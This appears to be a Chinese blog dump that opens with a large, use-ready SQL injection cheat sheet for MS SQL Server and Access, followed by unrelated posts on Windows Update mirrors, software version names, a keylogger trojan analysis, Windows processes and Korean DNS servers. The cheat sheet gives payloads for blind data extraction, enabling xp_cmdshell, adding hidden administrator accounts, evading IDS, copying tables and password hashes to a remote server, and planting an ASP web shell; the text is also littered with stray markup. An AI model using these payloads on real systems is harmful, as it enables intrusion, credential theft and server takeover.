收集一些注入语句

标准注入语句
1.判断有无注入点
; and 1=1 and 1=2
2.猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) —判断是否存在admin这张表

3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)

4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
and 1=(select count(*) from admin where len(*)>0)–
and 1=(select count(*) from admin where len(用户字段名称name)>0)
and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)

5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6) 错误
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6
and 1=(select count(*) from admin where len(name)=6) 正确

and 1=(select count(*) from admin where len(password)>11) 正确
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12
and 1=(select count(*) from admin where len(password)=12) 正确

6.猜解字符
and 1=(select count(*) from admin where left(name,1)=a) —猜解用户帐号的第一位
and 1=(select count(*) from admin where left(name,2)=ab)—猜解用户帐号的第二位
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) —
这个查询语句可以猜解中文的用户和_blank>密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.

group by users.id having 1=1–
group by users.id, users.username, users.password, users.privs having 1=1–
; insert into users values( 666, attacker, foobar, 0xffff )–

UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS WHERE TABLE_blank>_NAME=logintable-
UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank>_id)-
UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank>_id,login_blank>_name)-
UNION SELECT TOP 1 login_blank>_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_blank>_name=Rahul–

看_blank>服务器打的补丁=出错了打了SP4补丁
and 1=(select @@VERSION)–

看_blank>数据库连接账号的权限,返回正常,证明是_blank>服务器角色sysadmin权限。
and 1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin))–

判断连接_blank>数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)
and sa=(SELECT System_blank>_user)–
and user_blank>_name()=dbo–
and 0<>(select user_blank>_name()–

看xp_blank>_cmdshell是否删除
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_blank>_cmdshell)–

xp_blank>_cmdshell被删除,恢复,支持绝对路径的恢复
;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,xplog70.dll–
;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,c:/inetpub/wwwroot/xplog70.dll–

反向PING自己实验
;use master;declare @s int;exec sp_blank>_oacreate “wscript.shell”,@s out;exec sp_blank>_oamethod @s,”run”,NULL,”cmd.exe /c ping 192.168.0.1″;–

加帐号
;DECLARE @shell INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC SP_blank>_OAMETHOD @shell,run,null, C:/WINNT/system32/cmd.exe /c net user jiaoniang$ 1866574 /add–

创建一个虚拟目录E盘:
;declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, cscript.exe c:/inetpub/wwwroot/mkwebdir.vbs -w “默认Web站点” -v “e”,”e:/”–

访问属性:(配合写入一个webshell)
declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, cscript.exe c:/inetpub/wwwroot/chaccess.vbs -a w3svc/1/ROOT/e +browse

爆库 特殊_blank>技巧::%5c=/ 或者把/和/ 修改%5提交
and 0<>(select top 1 paths from newtable)–

得到库名(从1到5都是系统的id,6以上才可以判断)
and 1=(select name from master.dbo.sysdatabases where dbid=7)–
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
依次提交 dbid = 7,8,9…. 得到更多的_blank>数据库名

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 暴到一个表 假设为 admin
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin)) 来得到其他的表。
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin
and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个字段,假设为 user_blank>_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
(id,…)) 来暴出其他的字段
and 0<(select user_blank>_id from BBS.dbo.admin where username>1) 可以得到用户名
依次可以得到_blank>密码。。。。。假设存在user_blank>_id username ,password 等字段

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 得到表名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in(Address))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin and uid>(str(id))) 判断id值
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段

?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)

得到WEB路径
;create table [dbo].[swap] ([swappass][char](255));–
and (select top 1 swappass from swap)=1–
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_blank>_regread @rootkey=HKEY_blank>_LOCAL_blank>_MACHINE, @key=SYSTEM/CurrentControlSet/Services/W3SVC/Parameters/Virtual Roots/, @value_blank>_name=/, values=@test OUTPUT insert into paths(path) values(@test)–
;use ku1;–
;create table cmd (str image);– 建立image类型的表cmd

存在xp_blank>_cmdshell的测试过程:
;exec master..xp_blank>_cmdshell dir
;exec master.dbo.sp_blank>_addlogin jiaoniang$;– 加SQL帐号
;exec master.dbo.sp_blank>_password null,jiaoniang$,1866574;–
;exec master.dbo.sp_blank>_addsrvrolemember jiaoniang$ sysadmin;–
;exec master.dbo.xp_blank>_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;–
;exec master.dbo.xp_blank>_cmdshell net localgroup administrators jiaoniang$ /add;–
exec master..xp_blank>_servicecontrol start, schedule 启动_blank>服务
exec master..xp_blank>_servicecontrol start, server
; DECLARE @shell INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC SP_blank>_OAMETHOD @shell,run,null, C:/WINNT/system32/cmd.exe /c net user jiaoniang$ 1866574 /add
;DECLARE @shell INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC SP_blank>_OAMETHOD @shell,run,null, C:/WINNT/system32/cmd.exe /c net localgroup administrators jiaoniang$ /add
; exec master..xp_blank>_cmdshell tftp -i youip get file.exe– 利用TFTP上传文件

;declare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:/
;declare @a sysname set @a=xp+_blank>_cm’+’dshell exec @a dir c:/
;declare @a;set @a=db_blank>_name();backup database @a to disk=你的IP你的共享目录bak.dat
如果被限制则可以。
select * from openrowset(_blank>sqloledb,server;sa;,select OK! exec master.dbo.sp_blank>_addlogin hax)

查询构造:
SELECT * FROM news WHERE id=… AND topic=… AND …..
adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>
select 123;–
;use master;–
:a or name like fff%;– 显示有一个叫ffff的用户哈。
and 1<>(select count(email) from [user]);–
;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;–
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;–
;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;–
;update [users] set email=(select top 1 count(id) from password) where name=ffff;–
;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;–
;update [users] set email=(select top 1 name from password where id=2) where name=ffff;–
上面的语句是得到_blank>数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
通过查看ffff的用户资料可得第一个用表叫ad
然后根据表名ad得到这个表的ID 得到第二个表的名字

insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)–
insert into users values( 667,123,123,0xffff)–
insert into users values ( 123, admin–, password, 0xffff)–
;and user>0
;and (select count(*) from sysobjects)>0
;and (select count(*) from mysysobjects)>0 //为access_blank>数据库

枚举出数据表名
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);–
这是将第一个表名更新到aaa的字段处。
读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);–
然后id=1552 and exists(select * from aaa where aaa>5)
读出第二个表,一个个的读出,直到没有为止。
读字段是这样:
;update aaa set aaa=(select top 1 col_blank>_name(object_blank>_id(表名),1));–
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
;update aaa set aaa=(select top 1 col_blank>_name(object_blank>_id(表名),2));–
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名

[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)
通过SQLSERVER注入_blank>漏洞建_blank>数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]

[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
update 表名 set 字段=(select top 1 col_blank>_name(object_blank>_id(要查询的数据表名),字段列如:1) [ where 条件]

绕过IDS的检测[使用变量]
;declare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:/
;declare @a sysname set @a=xp+_blank>_cm’+’dshell exec @a dir c:/

1、 开启远程_blank>数据库
基本语法
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )
参数: (1) OLEDB Provider name
2、 其中连接字符串参数可以是任何端口用来连接,比如
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table
3.复制目标主机的整个_blank>数据库insert所有远程表到本地表。

基本语法:
insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2
这行语句将目标主机上table2表中的所有数据复制到远程_blank>数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如:
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _blank>_sysdatabases)
select * from master.dbo.sysdatabases
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _blank>_sysobjects)
select * from user_blank>_database.dbo.sysobjects
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _blank>_syscolumns)
select * from user_blank>_database.dbo.syscolumns
复制_blank>数据库:
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2

复制哈西表(HASH)登录_blank>密码的hash存储于sysxlogins中。方法如下:
insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _blank>_sysxlogins) select * from database.dbo.sysxlogins
得到hash之后,就可以进行暴力破解。

遍历目录的方法: 先创建一个临时表:temp
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));–
;insert temp exec master.dbo.xp_blank>_availablemedia;– 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_blank>_subdirs c:/;– 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:/;– 获得所有子目录的目录树结构,并寸入temp表中
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell type c:/web/index.asp;– 查看某个文件的内容
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:/;–
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:/ *.asp /s/a;–
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell cscript C:/Inetpub/AdminScripts/adsutil.vbs enum w3svc
;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:/;– (xp_blank>_dirtree适用权限PUBLIC)
写入表:
语句1:and 1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin));–
语句2:and 1=(SELECT IS_blank>_SRVROLEMEMBER(serveradmin));–
语句3:and 1=(SELECT IS_blank>_SRVROLEMEMBER(setupadmin));–
语句4:and 1=(SELECT IS_blank>_SRVROLEMEMBER(securityadmin));–
语句5:and 1=(SELECT IS_blank>_SRVROLEMEMBER(securityadmin));–
语句6:and 1=(SELECT IS_blank>_SRVROLEMEMBER(diskadmin));–
语句7:and 1=(SELECT IS_blank>_SRVROLEMEMBER(bulkadmin));–
语句8:and 1=(SELECT IS_blank>_SRVROLEMEMBER(bulkadmin));–
语句9:and 1=(SELECT IS_blank>_MEMBER(db_blank>_owner));–

把路径写到表中去:
;create table dirs(paths varchar(100), id int)–
;insert dirs exec master.dbo.xp_blank>_dirtree c:/–
and 0<>(select top 1 paths from dirs)–
and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))–
;create table dirs1(paths varchar(100), id int)–
;insert dirs exec master.dbo.xp_blank>_dirtree e:/web–
and 0<>(select top 1 paths from dirs1)–

把_blank>数据库备份到网页目录:下载
;declare @a sysname; set @a=db_blank>_name();backup database @a to disk=e:/web/down.bak;–

and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
and 1=(Select Top 1 col_blank>_name(object_blank>_id(USER_blank>_LOGIN),1) from sysobjects) 参看相关表。
and 1=(select user_blank>_id from USER_blank>_LOGIN)
and 0=(select user from USER_blank>_LOGIN where user>1)

-=- wscript.shell example -=-
declare @o int
exec sp_blank>_oacreate wscript.shell, @o out
exec sp_blank>_oamethod @o, run, NULL, notepad.exe
; declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, notepad.exe–

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_blank>_oacreate scripting.filesystemobject, @o out
exec sp_blank>_oamethod @o, opentextfile, @f out, c:/boot.ini, 1
exec @ret = sp_blank>_oamethod @f, readline, @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_blank>_oamethod @f, readline, @line out
end

declare @o int, @f int, @t int, @ret int
exec sp_blank>_oacreate scripting.filesystemobject, @o out
exec sp_blank>_oamethod @o, createtextfile, @f out, c:/inetpub/wwwroot/foo.asp, 1
exec @ret = sp_blank>_oamethod @f, writeline, NULL,
<% set o = server.createobject(“wscript.shell”): o.run( request.querystring(“cmd”) ) %>

declare @o int, @ret int
exec sp_blank>_oacreate speech.voicetext, @o out
exec sp_blank>_oamethod @o, register, NULL, foo, bar
exec sp_blank>_oasetproperty @o, speed, 150
exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528
waitfor delay 00:00:05

; declare @o int, @ret int exec sp_blank>_oacreate speech.voicetext, @o out exec sp_blank>_oamethod @o, register, NULL, foo, bar exec sp_blank>_oasetproperty @o, speed, 150 exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05–

xp_blank>_dirtree适用权限PUBLIC
exec master.dbo.xp_blank>_dirtree c:/
返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。
create table dirs(paths varchar(100), id int)
建表,这里建的表是和上面xp_blank>_dirtree相关连,字段相等、类型相同。
insert dirs exec master.dbo.xp_blank>_dirtree c:/
只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息

Windows Update 自动更新服务同步的镜像站点

 

Windows Update自动更新(SUS/软件更新服务)均是与微软的Windows Update自动更新服务同步的镜像站点.

这些Windows Update自动更新均是与微软Windows Update自动更新服务同步的镜像站点,在国内升级的话连接这些站点速度会比微软官方网站快得多。升级方法与效果与连接微软升级服务器完全相同.

如果你的XP,Win2003不能在线升级,可以到网上去查查,搜索一下,听说有了解决不能升级的办法,只需要简单修改一下注册表就行了. 但我还没有找到 ^_^

一下是国内的一些WindowsUpdate服务器
(不一定都能使用,有一些服务器做了限制,只有本地用户才可以)

上海外国语大学WindowsUpdate服务器
http://windowsupdate.shisu.edu.cn/

中原工学院WindowsUpdateService-自动更新服务SUS
http://windowsupdate.zzti.edu.cn

华中科技大学自动更新(Windows Update)服务
http://windowsupdate.hust.edu.cn/

哈尔滨工业大学WindowsUpdate自动更新服务
http://windowsupdate.hit.edu.cn/

西安交通大学软件学院WindowsUpdate服务器
http://202.117.21.253/

厦门大学网络中心WindowsUpdate自动更新服务
http://windowsupdate.xmu.edu.cn

上海交通大学WindowsUpdate自动更新服务
http://windowsupdate.sjtu.edu.cn

上海大学计算中心WindowsUpdate自动更新服务
http://windowsupdate.ccshu.net/windows/

网协本地WindowsUpdate自动更新服务
http://www.nxis.org.cn/

天津外国语学院信息网络中心WindowsUpdate自动更新服务
http://windowsupdate.tjfsu.edu.cn/

河北工业大学软件学院WindowsUpdate自动更新服务
http://windowsupdate.scse.hebut.edu.cn/

华南农业大学WindowsUpdate自动更新服务
http://sus.scau.edu.cn/

四川大学WindowsUpdate服务器
http://windowsupdate.scu.edu.cn/

软件版本号说明

软件版本号说明

 

alphal 内部测试版

beta 外部测试版

demo 演示版

Enhance 增强版或者加强版 属于正式版

Free 自由版

Full version 完全版 属于正式版

shareware 共享版

Release 发行版 有时间限制

Upgrade 升级版

Retail 零售版

Cardware 属共享软件的一种,只要给作者回复一封电邮或明信片即可。
(有的作者并由此提供注册码  等),目前这种形式已不多见。

Plus 属增强版,不过这种大部分是在程序界面及多媒体功能上增强。

Preview 预览版

Corporation & Enterprise 企业版

Standard 标准版

Mini 迷你版也叫精简版只有最基本的功能

Premium — 贵价版

Professional — 专业版

Express — 特别版

Deluxe — 豪华版

Regged — 已注册版

CN — 简体中文版

CHT — 繁体中文版

EN — 英文版

Multilanguage — 多语言版
Rip 是指从原版文件(一般是指光盘或光盘镜像文件)直接将有用的内容(核心内容)分离出来,剔除无用的文档,例如PDF说明文件啊,视频演示啊之类的东西,也 可以算做是精简版吧…但主要内容功能是一点也不能缺少的!另:DVDrip是指将视频和音频直接从DVD光盘里以文件方式分离出来。

trail 试用版(含有某些限制,如时间、功能,注册后也有可能变为正式版)

RC 版。是 Release Candidate 的缩写,意思是发布倒计时,该版本已经完成全部功能并清除大部分的BUG。到了这个阶段只会除BUG,不会对软件做任何大的更改。

RTM 版。这基本就是最终的版本,英文是 Release To Manufactur,意思是发布到生产商。

Original Equipment Manufacturer (OEM)

You may license products through an Original Equipment Manufacturer (OEM).
These products, such as Windows operating systems, come installed when you purchase a new computer.

OEM软件是给电脑生产厂的版本,无需多说。

Full Packaged Product (FPP)–Retail

Physical, shrink-wrapped boxes of licensed product that can be purchased in a local retail store or any local software retailer.

FPP就是零售版(盒装软件),这种产品的光盘的卷标都带有”FPP”字样,比如英文WXP Pro的FPP版本的光盘卷标就是WXPFPP_EN,其中WX表示是Windows XP,P是Professional(H是Home),FPP表明是零售版本,EN是表明是英语。获得途径除了在商店购买之外,某些MSDN用户也可以得 到。

Volume Licensing for Organizations (VLO)

You may enjoy potentially significant savings by acquiring multiple product licenses. Depending on the size and type of your organization.

团体批量许可证(大量采购授权合约),这是为团体购买而制定的一种优惠方式。这种产品的光盘的卷标都带有”VOL”字样,取”Volume”前 3个字母,以表明是批量,比如英文WXP Pro的VOL版本的光盘卷标就是WXPVOL_EN,其中WX表示是Windows XP,P是Professional(VOL没有Home版本),VOL表明是团体批量许可证版本,EN是表明是英语。获得途径主要是集团购买,某些 MSDN用户也可以得到。
这种版本根据购买数量等又细分为“开放式许可证”、“选择式许可证”、“企业协议”、“学术教育许可证”等以下5种版本

Open License
Select License
Enterprise Agreement
Enterprise Subscription Agreement
Academic Volume Licensing

由此可见,平时说的什么select/corp是许可证授权方式,他的出现是为了用若干种不同级别的优惠政策卖同一种软件,通过select /corp许可证授权方式得到的xxx的光盘都是VOL这一种、是并不是有很多种,只不过是相同的VOL光盘配以不同的许可证方式;而Volume Licensing (Product) Keys,即VLK,它所指的只是一个Key(密匙),仅仅是一个为证明产品合法化、以及安装所使用的Key,因为根据VOL计划规定,VOL产品是不需 要激活的!

或者说,VLK不是指一种版本,而是指这种版本在部署(deploy)过程中所需要的Key,而需要VLK这种Key的版本应该叫做VOL!只 不过在实际中,没有必要强调这种叫法、称呼的准确性,加之很多人的VOL版本光盘是通过企业的选择式许可证、企业协议等方式得到的等等原因,所以才会有很 多人叫他为“选择版”等等。
官方网站有一个表格,上面有一句话:“Different products require different Volume Licensing Keys (VLKs). Refer to the table below to make sure you have the correct VLK for your Microsoft product.”,我想这就很好的说明了VLK指的是Key而不是产品了。 很明显的,FPP需要激活,VOL不需要激活。
出处:PConline

网银大盗Ⅱ(Trojan/KeyLog.Dingxa)技术分析报告

“网银大盗Ⅱ”技术分析报告

  病毒名称:网银大盗Ⅱ(Trojan/KeyLog.Dingxa)
  病毒类型:木马
  病毒大小:16284字节
  传播方式:网络
  压缩方式:ASpack   2004年6月2日晚,又截获“网银大盗”新变种,该木马盗取几乎涵盖中国目前所有个人网上银行的帐号、密码、验证码等等,发送给病毒作者。此木马与4月分截获网银大盗(Trojan/PSW.HidWebmon)有异曲同工之处,但涉及银行之多,范围之广是历来最大的,不但给染毒用户造成的损失更大,更直接,也给各网上银行造成更大的安全威胁和信任危机。   具体技术特征如下:   1. 病毒运行后,盗取的网上银行涉及:
  
  银联支付网关–>执行支付
  银联支付网关:
  中国工商银行新一代网上银行
  中国工商银行网上银行:
  工商银行网上支付:
  申请牡丹信用卡
  招商银行个人银行
  招商银行一网通:
  个人网上银行
  中国建设银行网上银行
  登陆个人网上银行;;
  中国建设银行
  中国建设银行网上银行:
  交通银行网上银行
  交通银行网上银行:
  深圳发展银行帐户查询系统
  深圳发展银行|个人银行
  深圳发展银行 | 个人用户申请表
  深圳发展银行:
  民生网个人普通版
  民生银行:
  网上银行–个人普通业务
  华夏银行:
  上海银行企业网上银行
  上海银行
  首都电子商城商户管理平台
  首都电子商城商户管理
  中国在线支付网: IPAY网上支付中心
  中国在线支付网商户
  招商银行网上支付中心
  招商银行网上支付
  个人网上银行-网上支付   2. 病毒算机中创建以下文件:   %SystemDir%svch0st.exe,16284字节,病毒本身

  3. 在注册表的HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrent VersionRun中创建:   “svch0st.exe” = “%SystemDir%svch0st.exe”
  “taskmgr.exe” = “%SystemDir%svch0st.exe”

  4. 病毒运行后会根据IE窗口标题栏判断是否为网上银行页面,如果发现上述提到的银行后,病毒立即开始记录键盘敲击的每一个键值,记录键值包括:   AabCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz1
  !2@3#4$5%6^7&8*9(0)
  {BackSpace}
  {Tab}
  {回车}
  {Shift}
  {Ctrl}
  {Alt}
  {Pause}
  {Esc}
  {空格}
  {End}
  {Home}
  {Left}
  {Right}
  {Up}
  {Down}
  {Insert}
  {Delete}
  ;:=+,<-_.>/?`~][{|]}’
  {Del}
  {F1}
  {F2}
  {F3}
  {F4}
  {F5}
  {F6}
  {F7}
  {F8}
  {F9}
  {F10}
  {F11}
  {F12}
  {NumLock}
  {ScrollLock}
  {PrintScreen}
  {PageUp}
  {PageDown}   5. 病毒截取到键盘值后,会形成信息发到指定http://*****.com/****/get.asp。其信息如下:   http://*****.com/****/get.asp?txt=××银行:<截获的按键>   6.病毒开启3个定时器,每隔几秒钟搜索用户的IE窗口,如果发现用户正在使用上述银行的“个人网上银行”的登陆界面,则尝试记录用户键入的所有键值,然后把窃取到的信息通过get方式发送到指定的服务器。

出处:江民科技

]]>

Win2000/XP系统缺省进程

Win2000/XP系统缺省进程

在Windows 2000 和XP中,系统包含以下缺省进程:
Csrss.exe
Explorer.exe
Internat.exe
Lsass.exe
Mstask.exe
Smss.exe
Spoolsv.exe
Svchost.exe
Services.exe
System
System Idle Process
Taskmgr.exe
Winlogon.exe
Winmgmt.exe 下面列出更多的进程和它们的简要说明 进程名描述 smss.exeSessionManager
csrss.exe 子系统服务器进程
winlogon.exe管理用户登录
services.exe包含很多系统服务
lsass.exe 管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序。
svchost.exe Windows 2000/XP 的文件保护系统
SPOOLSV.EXE 将文件加载到内存中以便迟后打印。)
explorer.exe资源管理器
internat.exe托盘区的拼音图标)
mstask.exe允许程序在指定时间运行。
regsvc.exe允许远程注册表操作。(系统服务)->remoteregister
winmgmt.exe 提供系统管理信息(系统服务)。
inetinfo.exemsftpsvc,w3svc,iisadmn
tlntsvr.exe tlnrsvr
tftpd.exe 实现 TFTP Internet 标准。该标准不要求用户名和密码。
termsrv.exe termservice
dns.exe 应答对域名系统(DNS)名称的查询和更新请求。
tcpsvcs.exe 提供在 PXE 可远程启动客户计算机上远程安装 Windows 2000 Professional 的能力。
ismserv.exe 允许在 Windows Advanced Server 站点间发送和接收消息。
ups.exe 管理连接到计算机的不间断电源(UPS)。
wins.exe为注册和解析 NetBIOS 型名称的 TCP/IP 客户提供 NetBIOS 名称服务。
llssrv.exe证书记录服务
ntfrs.exe 在多个服务器间维护文件目录内容的文件同步。
RsSub.exe 控制用来远程储存数据的媒体。
locator.exe 管理 RPC 名称服务数据库。
lserver.exe 注册客户端许可证。
dfssvc.exe管理分布于局域网或广域网的逻辑卷。
clipsrv.exe 支持“剪贴簿查看器”,以便可以从远程剪贴簿查阅剪贴页面。
msdtc.exe 并列事务,是分布于两个以上的数据库,消息队列,文件系统或其它事务保护护资源管理器。
faxsvc.exe帮助您发送和接收传真。
cisvc.exe 索引服务
dmadmin.exe 磁盘管理请求的系统管理服务。
mnmsrvc.exe 允许有权限的用户使用 NetMeeting 远程访问 Windows 桌面。
netdde.exe提供动态数据交换 (DDE) 的网络传输和安全特性。
smlogsvc.exe配置性能日志和警报。
rsvp.exe为依赖质量服务(QoS)的程序和控制应用程序提供网络信号和本地通信控制安装功功能。
RsEng.exe 协调用来储存不常用数据的服务和管理工具。
RsFsa.exe 管理远程储存的文件的操作。
grovel.exe扫描零备份存储(SIS)卷上的重复文件,并且将重复文件指向一个数据存储点,以节省磁盘空间(只对 NTFS 文件系统有用)。
SCardSvr.ex 对插入在计算机智能卡阅读器中的智能卡进行管理和访问控制。
snmp.exe包含代理程序可以监视网络设备的活动并且向网络控制台工作站汇报。
snmptrap.exe接收由本地或远程 SNMP 代理程序产生的陷阱(trap)消息,然后将消息传递到运行在这台计算机上 SNMP 管理程序。
UtilMan.exe 从一个窗口中启动和配置辅助工具。
msiexec.exe依据 .MSI 文件中包含的命令来安装、修复以及删除软件。
]]>

一些国外DNS服务器 韩国[kr]

 

今天在网上闲逛,发现了几个韩国的DNS服务器.
摘了下来,常看韩国站点,或一些被国内屏幂的站点的朋友,可以试试.

单捞哪.
nis.dacom.co.kr internet address = 164.124.101.31
ns2.dacom.co.kr internet address = 203.248.240.31

窍捞炮.
nis.hitel.net internet address = 203.245.15.9
nis2.hitel.net internet address = 211.47.45.23

窍唱齿.
ns.hananet.net internet address = 210.94.0.7
ns2.hananet.net internet address = 210.180.98.69

穿府齿.
ns.kr.psi.net internet address = 203.255.112.34
ns2.kr.psi.net internet address = 203.255.112.4
ns.jp.psi.net internet address = 154.33.63.254
ns.cw.net internet address = 204.70.128.1

内齿.
NS.kornet.net internet address = 168.126.63.1
NS2.kornet.net internet address = 168.126.63.2
VDNS.kornet.net internet address = 168.126.3.30
W4.kornet.net internet address = 168.126.63.21

唱快穿府.
ns.nownuri.net internet address = 203.238.128.24
ns2.nownuri.net internet address = 203.238.128.22

俊掂齿.
ns.edunet4u.net internet address = 210.102.100.1

滴风齿
ns2.thrunet.com internet address = 210.117.65.2
ns.thrunet.com internet address = 210.117.65.100

“欺骗你的眼睛” — 视觉游戏

视觉游戏——“眼见不一定为实”

们会经常说“眼见为实”,但是,要知道,视觉作为最直观获取信息的渠道并不是绝对的靠。这里我推荐的就是比较有名的错觉图片。也许这样的错觉来自于图片的二维属性,但是对于最基本的视觉关注是我在这里提倡的。三维与时间对于空间的作用,相信更值得关注。


]]>

大学教授的讲演语录节选

 

一个大学教授让人发冷汗的讲演


演讲人:浙大高分子物理郑强教授

语录节选:

“在中国这个发展中国家,你能建10所世界一流大学,那美国有多少所?日本有多少所? 现在的实际状况是:世界上前200所大学,中国一所都排不进!在亚洲能排出几所?我到国外去看了以后,感到要将浙大建成世界一流大学就像共产主义理想.”

